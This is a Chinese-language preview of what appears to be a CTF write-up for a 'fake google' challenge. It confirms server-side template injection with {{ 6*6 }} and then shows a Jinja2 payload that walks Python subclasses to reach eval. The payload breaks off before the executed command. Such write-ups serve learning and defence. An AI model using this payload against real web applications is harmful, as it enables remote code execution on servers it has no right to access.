fake google 谷歌搜索框搜索后源码提示ssti,试了下{{ 6*6 }}发现输出36,exp: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='_IterationGuard' %} {{ c.__init__.__globals__['__builtins__']['eval']("...
fake google 谷歌搜索框搜索后源码提示ssti,试了下{{ 6*6 }}发现输出36,exp: {% f...
阅读全文>>_ _ _ _ ___ ___ | | | | | | | | \/ | | |_| | |__ | |__ | . . | | _ | '_ \| '_ \| |\/| | | | | | | | | | | | | | | \_| |_/_| |_|_| |_\_| |_/